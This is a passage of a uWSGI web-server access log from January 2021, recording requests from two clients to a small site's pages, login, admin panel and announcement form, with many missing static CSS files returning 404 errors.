bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2982] 180.160.48.43 () {40 vars in 849 bytes} [Thu Jan 14 12:46:52 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2983] 180.160.48.43 () {40 vars in 865 bytes} [Thu Jan 14 12:46:52 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2984] 180.160.48.43 () {40 vars in 856 bytes} [Thu Jan 14 12:46:52 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2985] 180.160.48.43 () {40 vars in 848 bytes} [Thu Jan 14 12:46:52 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2986] 180.160.48.43 () {40 vars in 928 bytes} [Thu Jan 14 12:46:52 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2987] 180.160.48.43 () {40 vars in 906 bytes} [Thu Jan 14 12:46:53 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2232/2988] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:47:10 2021] GET /single/4/ => generated 9412 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +0 +0 +[, ] +[pid: 661|app: 0|req: 2233/2989] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:47:16 2021] GET /all-8-0-0 => generated 10442 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2234/2990] 180.160.48.43 () {40 vars in 920 bytes} [Thu Jan 14 12:47:44 2021] GET /publish/ => generated 5234 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2991] 180.160.48.43 () {40 vars in 862 bytes} [Thu Jan 14 12:47:45 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +0 +0 +[, ] +[pid: 661|app: 0|req: 2235/2992] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:49:12 2021] GET /all-5-0-0 => generated 10439 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +0 +[] +[pid: 661|app: 0|req: 2236/2993] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:49:14 2021] GET /all-4-0-0 => generated 10003 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2994] 180.160.48.43 () {40 vars in 903 bytes} [Thu Jan 14 12:49:14 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2237/2995] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:49:15 2021] GET /single/2/ => generated 9534 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +[] +[pid: 661|app: 0|req: 2238/2996] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:49:18 2021] GET /all-3-0-0 => generated 10006 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2239/2997] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:49:19 2021] GET /all-0-0-0 => generated 13672 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2998] 180.160.48.43 () {40 vars in 897 bytes} [Thu Jan 14 12:49:19 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2999] 180.160.48.43 () {40 vars in 973 bytes} [Thu Jan 14 12:49:19 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/3000] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:49:19 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +...The work of process 661 is done. Seeya! +worker 1 killed successfully (pid: 661) +Respawned uWSGI worker 1 (new pid: 15176) +[pid: 15176|app: 0|req: 2240/3001] 180.160.48.43 () {40 vars in 936 bytes} [Thu Jan 14 12:49:21 2021] GET /ownpublish-0-0-0 => generated 10376 bytes in 62 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2241/3002] 180.160.48.43 () {40 vars in 914 bytes} [Thu Jan 14 12:49:27 2021] GET /home/ => generated 10101 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3003] 180.160.48.43 () {40 vars in 864 bytes} [Thu Jan 14 12:49:27 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2242/3004] 180.160.48.43 () {40 vars in 912 bytes} [Thu Jan 14 12:49:36 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2243/3005] 180.160.48.43 () {40 vars in 919 bytes} [Thu Jan 14 12:49:37 2021] GET /my-admin/ => generated 5366 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 15176|app: 0|req: 2244/3006] 180.160.48.43 () {38 vars in 806 bytes} [Thu Jan 14 12:49:37 2021] GET /favicon.ico => generated 3480 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2245/3007] 180.160.48.43 () {48 vars in 1016 bytes} [Thu Jan 14 12:49:41 2021] POST /my-admin/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2246/3008] 180.160.48.43 () {40 vars in 926 bytes} [Thu Jan 14 12:49:41 2021] GET /admin-home/ => generated 22351 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3009] 180.160.48.43 () {40 vars in 860 bytes} [Thu Jan 14 12:49:41 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3010] 180.160.48.43 () {40 vars in 872 bytes} [Thu Jan 14 12:49:41 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3011] 180.160.48.43 () {40 vars in 926 bytes} [Thu Jan 14 12:49:41 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2247/3012] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 12:49:41 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2248/3013] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 12:49:41 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2249/3014] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 12:49:41 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2250/3015] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 12:49:41 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2251/3016] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:49:41 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2252/3017] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:49:41 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2253/3018] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 12:49:41 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2254/3019] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 12:49:41 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3020] 180.160.48.43 () {40 vars in 889 bytes} [Thu Jan 14 12:49:41 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2255/3021] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 12:49:41 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3022] 180.160.48.43 () {40 vars in 901 bytes} [Thu Jan 14 12:49:41 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3023] 180.160.48.43 () {40 vars in 907 bytes} [Thu Jan 14 12:49:41 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3024] 180.160.48.43 () {40 vars in 865 bytes} [Thu Jan 14 12:49:41 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3025] 180.160.48.43 () {40 vars in 853 bytes} [Thu Jan 14 12:49:41 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3026] 180.160.48.43 () {40 vars in 841 bytes} [Thu Jan 14 12:49:41 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3027] 180.160.48.43 () {40 vars in 929 bytes} [Thu Jan 14 12:49:41 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3028] 180.160.48.43 () {40 vars in 851 bytes} [Thu Jan 14 12:49:41 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3029] 180.160.48.43 () {40 vars in 925 bytes} [Thu Jan 14 12:49:41 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +zhiding +置顶 +[pid: 15176|app: 0|req: 2256/3030] 180.160.48.43 () {48 vars in 1022 bytes} [Thu Jan 14 12:49:56 2021] POST /admin-home/ => generated 27 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2257/3031] 180.160.48.43 () {40 vars in 928 bytes} [Thu Jan 14 12:49:57 2021] GET /admin-home/ => generated 22351 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2258/3032] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 12:49:57 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2259/3033] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 12:49:57 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2260/3034] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 12:49:57 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2261/3035] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 12:49:57 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2262/3036] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:49:57 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2263/3037] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:49:57 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2264/3038] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 12:49:57 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2265/3039] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 12:49:57 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2266/3040] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 12:49:57 2021] GET /static/css/animate.css => generated 3513 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2267/3041] 180.160.48.43 () {40 vars in 932 bytes} [Thu Jan 14 12:49:58 2021] GET /announcement/ => generated 11847 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2268/3042] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 12:49:58 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2269/3043] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 12:49:58 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2270/3044] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 12:49:58 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2271/3045] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:49:58 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2272/3046] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 12:49:58 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2273/3047] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:49:58 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2274/3048] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 12:49:58 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2275/3049] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 12:49:58 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2276/3050] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 12:49:58 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2277/3051] 180.160.48.43 () {48 vars in 1028 bytes} [Thu Jan 14 12:50:04 2021] POST /announcement/ => generated 27 bytes in 31 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2278/3052] 180.160.48.43 () {40 vars in 934 bytes} [Thu Jan 14 12:50:04 2021] GET /announcement/ => generated 10914 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2279/3053] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 12:50:04 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2280/3054] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 12:50:04 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2281/3055] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 12:50:04 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2282/3056] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 12:50:04 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2283/3057] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:50:04 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2284/3058] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 12:50:04 2021] GET /static/css/spinners.css => generated 3516 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2285/3059] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:50:04 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2286/3060] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 12:50:04 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2287/3061] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 12:50:04 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2288/3062] 219.228.146.135 () {38 vars in 865 bytes} [Thu Jan 14 12:51:12 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3063] 219.228.146.135 () {40 vars in 865 bytes} [Thu Jan 14 12:51:12 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3064] 219.228.146.135 () {40 vars in 887 bytes} [Thu Jan 14 12:51:12 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3065] 219.228.146.135 () {40 vars in 869 bytes} [Thu Jan 14 12:51:12 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3066] 219.228.146.135 () {40 vars in 873 bytes} [Thu Jan 14 12:51:12 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3067] 219.228.146.135 () {40 vars in 908 bytes} [Thu Jan 14 12:51:12 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2289/3068] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 12:51:25 2021] POST /login/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2290/3069] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 12:51:25 2021] GET /home/ => generated 10331 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3070] 219.228.146.135 () {40 vars in 901 bytes} [Thu Jan 14 12:51:25 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3071] 219.228.146.135 () {40 vars in 895 bytes} [Thu Jan 14 12:51:25 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +0 +[] +[pid: 15176|app: 0|req: 2291/3072] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 12:51:43 2021] GET /all-3-0-0 => generated 9986 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2292/3073] 219.228.146.135 () {40 vars in 938 bytes} [Thu Jan 14 12:51:46 2021] GET /ownpublish-0-0-0 => generated 9822 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2293/3074] 219.228.146.135 () {40 vars in 929 bytes} [Thu Jan 14 12:51:50 2021] GET /publish/ => generated 5234 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2294/3075] 219.228.146.135 () {40 vars in 923 bytes} [Thu Jan 14 12:51:55 2021] GET /home/ => generated 10331 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2295/3076] 219.228.146.135 () {40 vars in 918 bytes} [Thu Jan 14 12:51:58 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2296/3077] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 12:51:58 2021] GET /single/4/ => generated 9392 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2298/3078] 180.160.48.43 () {40 vars in 934 bytes} [Thu Jan 14 12:52:30 2021] GET /announcement/? => generated 10914 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2298/3079] 180.160.48.43 () {48 vars in 1028 bytes} [Thu Jan 14 12:52:30 2021] POST /announcement/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2299/3080] 180.160.48.43 () {38 vars in 883 bytes} [Thu Jan 14 12:52:30 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2300/3081] 180.160.48.43 () {38 vars in 895 bytes} [Thu Jan 14 12:52:30 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2301/3082] 180.160.48.43 () {38 vars in 927 bytes} [Thu Jan 14 12:52:30 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2302/3083] 180.160.48.43 () {38 vars in 851 bytes} [Thu Jan 14 12:52:30 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2303/3084] 180.160.48.43 () {38 vars in 871 bytes} [Thu 